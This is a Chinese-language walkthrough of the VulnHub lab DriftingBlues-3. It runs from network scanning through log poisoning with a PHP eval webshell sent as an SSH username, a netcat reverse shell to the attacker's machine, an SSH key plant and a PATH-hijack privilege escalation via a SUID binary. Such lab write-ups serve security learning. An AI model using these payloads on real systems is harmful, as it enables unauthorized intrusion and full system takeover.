一.环境搭建

1.靶场描述

get flags
difficulty: easy
about vm: tested and exported from virtualbox. dhcp and nested  vtx/amdv enabled. you can contact me by email for troubleshooting or  questions.
This works better with VirtualBox rather than VMware

2.靶场下载

https://www.vulnhub.com/entry/driftingblues-3,656/

3.靶场启动

靶场网段我们知道是192.168.1.0/24,我们进行探测

二.信息收集

1.寻找靶场真实ip

nmap -sP 192.168.1.0/24

arp-scan -l

靶场真实ip地址为192.168.1.8

2.探测端口及服务

nmap -p- -sV 192.168.1.8

发现开启了22端口，服务为OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
发现开启了80端口，服务为Apache httpd 2.4.38 ((Debian))

三.渗透测试

1.访问web服务

http://192.168.1.8

2.扫描web服务

1)nikto扫描

nikto -h http://192.168.1.8

我们扫描到三个目录，一个一个进行访问

发现只有robots.txt目录是有信息的，其他的都没有用

2)dirsearch目录扫描

dirsearch -u 192.168.1.8 -e * -x 403 --random-agent

还是只有robots.txt目录，那么我们进行分析即可

3.渗透测试

1)访问robots.txt

http://192.168.1.8/robots.txt

我们继续访问

http://192.168.1.8/eventadmins/

我们继续访问

http://192.168.1.8/littlequeenofspades.html

我们访问源代码，可以看到一串base64编码，我们进行解密

最后解密出来是一个目录，我们进行访问

http://192.168.1.8/adminsfixit.php

我们可以看到是ssh日志记录，那么我们可以试试一句话木马连接ssh，会不会被记录

2)ssh日志记录

ssh '<?php @eval($_POST['MS02423']);?>'@192.168.1.8

我们连接蚁剑，发现可以连接成功

这样我们就可以反弹shell了

3)反弹shell

方法一:我们使用cmd进行反弹

http://192.168.1.8/adminsfixit.php/?cmd=system(%27nc%20-e%20/bin/bash%20192.168.1.9%205555%27);

我们可以看到反弹成功

方法二:我们使用蚁剑虚拟终端进行反弹

我们可以看到反弹成功，这两个方法都可以试试

4)SSH密钥

分析查看靶机内文件，发现home目录下有一个robertj用户，且该用户目录下存在两个文件，user.txt”文件没有权限无法打开，.ssh 目录有可读可写可执行权限，进入 .ssh 目录进行查看，发现目录内没有任何文件内容

继续查看分析，查看ssh配置文件（默认目录/etc/ssh/sshd_config），发现可以公钥登录，并且给出了公钥文件存放目录 /home/robertj/.ssh/authorized_keys

尝试把公钥放入.ssh目录内，使用 ssh-keygen工具生成公密钥，并将生成的密钥保存到 /home/robertj/.ssh/ 目录下

ssh-keygen -t rsa
-t    指定生成的密钥类型，默认为RSA类型

我们可以看到写入成功

将生成的公钥内容输出到authorized_keys文件内

查看私钥文件，将内容复制出来，粘贴到本地文件中, 注意要将id_rsa文件的权限修改为与创建时权限一致

5)ssh登录

我们进行登录

ssh robertj@192.168.1.8 -i '/home/kali/桌面/1.txt' 

我们查看user.txt，看到第一个flag

6)提权

我们使用sudo -l查看，发现没有

那么我们使用另一条命令，使用 find 命令寻找suid程序，发现一个可疑程序/usr/bin/getinfo

find / -perm -4000 -type f 2>/dev/null

执行该程序，根据执行结果发现分别运行了ip addr、cat /etc/hosts、uname -a命令

可以通过修改环境来进行命令劫持提权

通过修改环境变量让getinfo在调用命令调用到我们伪造的ip命令（在检索环境时会先调用最前面的环境也就是最新写入的环境），来达到提权的效果

export PATH=/tmp/:$PATH             把/tmp路径写入到系统路径中
cd /tmp
echo '/bin/bash' > ip                       把/bin/bash写入到ip文件中(相当于创建ip并写入/bin/bash)
chmod +x ip                                    给ip文件增加执行权限

我们查看flag即可